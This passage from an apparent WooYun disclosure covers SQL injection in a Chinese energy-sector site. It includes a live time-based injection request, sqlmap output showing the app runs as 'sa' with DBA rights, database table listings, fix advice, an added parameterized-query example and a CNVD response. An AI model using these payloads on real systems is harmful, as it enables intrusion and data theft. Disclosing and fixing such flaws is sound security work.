mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox1=333' WAITFOR DELAY '0:0:5'--&UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges%3E%3C/StateChanges%3E%3C/DisplayLayout%3E&ImageButton1.x=67&ImageButton1.y=13
---
[10:51:01] [INFO] testing Microsoft SQL Server
[10:51:01] [INFO] confirming Microsoft SQL Server
[10:51:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2008
[10:51:01] [INFO] fetching current user
[10:51:01] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[10:51:01] [INFO] fetching current database
current database: 'PowerV3'
[10:51:01] [INFO] testing if current user is DBA
current user is DBA: True


4.jpg


Database: Collect_SH
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| dbo.Data | 138 |
| dbo.ItemList | 48 |
| dbo.GroupRight | 22 |
| dbo.PictureList | 16 |
| dbo.ModelParameter | 14 |
| dbo.FunList | 10 |
| dbo.Menu | 9 |
| dbo.Users | 9 |
| dbo.v_Users | 9 |
| dbo.Customer | 3 |
| dbo.HealthReminder | 3 |
| dbo.UserGroups | 3 |
+--------------------+---------+


Database: power_wujiang
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| dbo.Data | 152 |
| dbo.ItemList | 49 |
| dbo.Map | 29 |
| dbo.GroupRight | 22 |
| dbo.FunList | 16 |
| dbo.Menu | 15 |
| dbo.ModelParameter | 14 |
| dbo.Users | 9 |
| dbo.v_Users | 9 |
| dbo.Customer | 3 |
| dbo.HealthReminder | 3 |
| dbo.UserGroups | 3 |
| dbo.PictureList | 2 |
+--------------------+---------+


The user passwords in these two databases are also in plaintext; I will not paste them.
I did not test the remaining places, for fear of modifying data. Leaving it at that; the main issue is this search field.

Proof of vulnerability:

3.jpg

Fix recommendations:

Input filtering (better: parameterized queries for every form field)
Stronger passwords, stored as salted hashes
Privilege restriction (the application should not connect as sa, and xp_cmdshell should stay disabled)
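As an added illustration of the first two recommendations (not code from the report or from the affected platform), the following places a change-password handler written the way the evidence above implies the site's ChangePassword.aspx works (form fields spliced into SQL text, plaintext password column) beside a parameterized version that stores salted PBKDF2 hashes. sqlite3 stands in for the site's SQL Server, and the Users table layout is an assumption, not the site's real schema.

```python
"""Added example: concatenated vs. parameterized change-password handler, and
plaintext vs. salted-hash password storage. sqlite3 stands in for the site's
SQL Server; table and column names are assumptions."""
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

PBKDF2_ITERATIONS = 100_000  # tune so one verification costs ~100 ms on the auth host


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256; the stored string carries its own parameters."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def make_db(plaintext: bool) -> sqlite3.Connection:
    """Constructed sample Users table (assumed layout). plaintext=True mirrors what
    the report found in the PowerV3 / Collect_SH / power_wujiang user tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT PRIMARY KEY, Password TEXT NOT NULL)")
    for user, pw in (("admin", "111111"), ("operator", "123456")):
        conn.execute("INSERT INTO Users VALUES (?, ?)",
                     (user, pw if plaintext else hash_password(pw)))
    return conn


def vulnerable_change_password(conn, username: str, old_pw: str, new_pw: str) -> bool:
    """The pattern the report's payloads imply: form fields spliced into SQL text.
    On SQL Server the same splice also accepts stacked statements
    ("admin'; WAITFOR DELAY '0:0:5'--", xp_cmdshell); sqlite3.execute() rejects a
    second statement, so only the comment-out form is exercised here."""
    check = (f"SELECT COUNT(*) FROM Users WHERE UserName = '{username}' "
             f"AND Password = '{old_pw}'")
    if conn.execute(check).fetchone()[0] != 1:
        return False
    conn.execute(f"UPDATE Users SET Password = '{new_pw}' WHERE UserName = '{username}'")
    return True


def safe_change_password(conn, username: str, old_pw: str, new_pw: str) -> bool:
    """Parameters travel separately from the SQL text, so ' ; and -- are just data,
    and the old password is checked against a salted hash, never stored plaintext."""
    row = conn.execute("SELECT Password FROM Users WHERE UserName = ?", (username,)).fetchone()
    if row is None or not verify_password(old_pw, row[0]):
        return False
    conn.execute("UPDATE Users SET Password = ? WHERE UserName = ?",
                 (hash_password(new_pw), username))
    return True


def stored_password(conn, username: str) -> Optional[str]:
    row = conn.execute("SELECT Password FROM Users WHERE UserName = ?", (username,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "admin'--"  # closes the quote and comments out the old-password check
    weak = make_db(plaintext=True)
    print("vulnerable:", vulnerable_change_password(weak, payload, "wrong", "pwned"),
          "admin password now:", stored_password(weak, "admin"))
    hard = make_db(plaintext=False)
    print("hardened:", safe_change_password(hard, payload, "wrong", "pwned"),
          "admin password still a hash:", stored_password(hard, "admin")[:22])
```

The payload admin'-- is the same shape as the report's admin'; ... -- and admin' WAITFOR DELAY ... --; against the concatenated query it resets the administrator's password without knowing the old one, against the parameterized query it is simply a user name that does not exist. The third recommendation is a server-side configuration matter that this code cannot show: the application login should hold only the rights it needs on PowerV3 rather than being sa, and xp_cmdshell should remain off (sp_configure 'xp_cmdshell', 0 after enabling 'show advanced options'), which also closes the --os-shell path the report demonstrated.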

Copyright notice: please credit the source when reposting. 路人甲@乌云


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-10-12 08:29

Vendor comment:

CNVD has confirmed and reproduced the described situation, and has forwarded it via CNCERT to the competent informatization authority for the energy industry, which will coordinate handling with the site's operating unit.

Latest status:

None yet